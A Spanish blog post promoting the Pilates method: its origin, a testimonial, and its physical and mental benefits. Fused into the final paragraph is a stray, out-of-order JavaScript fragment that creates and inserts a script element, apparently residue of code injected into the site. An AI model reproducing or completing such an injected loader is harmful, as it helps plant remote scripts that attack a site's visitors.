Salud y belleza » Belleza, Deportes, Salud

Conociendo más sobre el método Pilates

Sin Comentarios

El método Pilates es un práctico y popular sistema de entrenamiento físico y mental creado a principios del siglo XX. Joseph Hubertus Pilates es el padre de este concepto quien lo desarrolló a partir de su conocimiento en especialidades tales como gimnasia, traumatología, ballet y yoga. No hace falta, entonces, ser un genio para comprender que el método Pilates es una de las formas más completas y sanas de hacer ejercicio.

Metodo Pilates

“A nuestro local, llegan alumnos que ya no pueden agacharse ni moverse y que han perdido el mínimo de flexibilidad necesario. Ellos no pueden levantar los brazos más alto que su cabeza, han perdido movilidad, vitalidad y hasta fe. Pero con nuestras clases todo eso cambia en poco tiempo. Este sistema los vuelve a insertar en el mundo de la actividad, del ejercicio. No solo se integran y conocen gente, sino que vuelven a sus actividades diarias y no gastan ni la mitad de energía que gastaban antes pues, ahora, están más fuertes y entrenados. Pilates, como vemos, es un estilo de vida” afirma uno de los hombres más fuertes de la corriente pilatista en España.

Entre los beneficios más destacados del método Pilates se destacan el mejoramiento de la condición física y mental; la potenciación de los músculos; el aumento de la flexibilidad y elasticidad; el alivio de malestares fisicos y dolores (de espalda, de cervicales, de rodillas, de cadera, entre otros); la facilidad para conseguir una figura sumamente estilizada; la tonificación muscular; el mejoramiento en la alineación postural; y tantos otros.

Con el método Pilates tenemos una herramienta perfecta para combatir males como el sedentarismo. Es ideal para personas que buscan combinar el trabajo físico con la relajación. Además es uno de los sistemas más recomendados por médicos para aquellas personas que se encuentran en rehabilitación por haber sufrido un accidente grave.

Si bien los estudios indican que la mayoría de las mujeres escoge Pilates, no es privativo de ellas: muchos hombres también se animan a acudir a clases de Pilates.

Otro punto a favor del método Pilates tiene que ver con la eficacia y eficiencia: Pilates reúne ambos términos. Los resultados en el cuerpo comienzan a notarse a las pocas semanas de comenzar con los ejercicios y, por tratarse de una actividad anaeróbica no se fuerza el nivel cardiorrespiratorio (los ejercicios no son de resistencia) por lo tanto podemos aumentar las cargas temporales de Pilates a nuestro gusto (sin exagerar, claro).document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.